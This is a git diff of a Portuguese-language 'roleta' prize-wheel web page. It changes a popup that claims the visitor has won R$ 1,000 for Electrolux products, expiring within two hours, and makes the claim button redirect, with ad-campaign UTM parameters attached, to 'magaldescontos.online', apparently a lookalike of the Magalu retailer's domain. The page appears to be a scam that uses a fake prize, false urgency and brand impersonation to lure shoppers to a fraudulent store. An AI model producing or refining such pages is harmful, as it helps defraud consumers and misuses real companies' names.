--- a/roletamag/index.html
+++ b/roletamag/index.html
@@ -2,6 +2,9 @@
 
 
 
+
+
+
 <html><head>
     
   <meta charset="utf-8">
@@ -139,7 +142,7 @@
   <span class="close">×</span>
   <img src="https://c2.cdn1tp.net/1bcd9aff77e94f04877ed9d534aaef02/images/party-popper-emoji-503x512-0vkq9zgo.png" style="width: 30%;"> <br> <br>
   <h2>Parabéns, você ganhou R$ 1.000</h2> <br><br>
-  <p>Parabéns, você ganhou R$ 1.000 para usar como quiser nos produtos selecionados da linha Magalu. Para usá-los, basta clicar no botão abaixo e você será redirecionado para uma página onde seu saldo já está pronto para uso. Esse saldo expira dentro de 2 horas, por isso, é importante que você seja rápido com a sua compra.</p> <br><br>
+  <p>Parabéns, você ganhou R$ 1.000 para usar como quiser nos produtos selecionados da linha Electrolux. Para usá-los, basta clicar no botão abaixo e você será redirecionado para uma página onde seu saldo já está pronto para uso. Esse saldo expira dentro de 2 horas, por isso, é importante que você seja rápido com a sua compra.</p> <br><br>
   <button class="btn">Aproveitar meu prêmio</button>
 </div>
 </div>
@@ -192,14 +195,32 @@
       }
   }
 
-  // Ação do botão "Aproveitar meu prêmio"
-  prizeBtn.onclick = function() {
-      window.open('https://e6c4c0-92.myshopify.com/collections/roleta', '_blank').focus();
-    
-  }
+// Função para obter parâmetros da URL
+function getParameterByName(name, url) {
+    if (!url) url = window.location.href;
+    name = name.replace(/[\[\]]/g, '\\$&');
+    var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
+        results = regex.exec(url);
+    if (!results) return null;
+    if (!results[2]) return '';
+    return decodeURIComponent(results[2].replace(/\+/g, ' '));
+}
+
+// Obter parâmetros da URL 1
+var campaignId = getParameterByName('utm_source');
+var campaignName = getParameterByName('utm_medium');
+var adsetName = getParameterByName('utm_campaign');
+var adName = getParameterByName('utm_content');
+
+// Ação do botão "Aproveitar meu prêmio"
+prizeBtn.onclick = function() {
+    var url = 'https://magaldescontos.online/collections/roleta/?utm_source=' + campaignId + '&utm_medium=' + campaignName + '&utm_campaign=' + adsetName + '&utm_content=' + adName;
+    window.location.href = url;
+}
 </script>
 
-                    <script async="true" src="https://c1.cdn1tp.net/ghelper/googletagmanager.js"></script>
+
+
 <!-- Meta Pixel Code -->
 <script>
 !function(f,b,e,v,n,t,s)
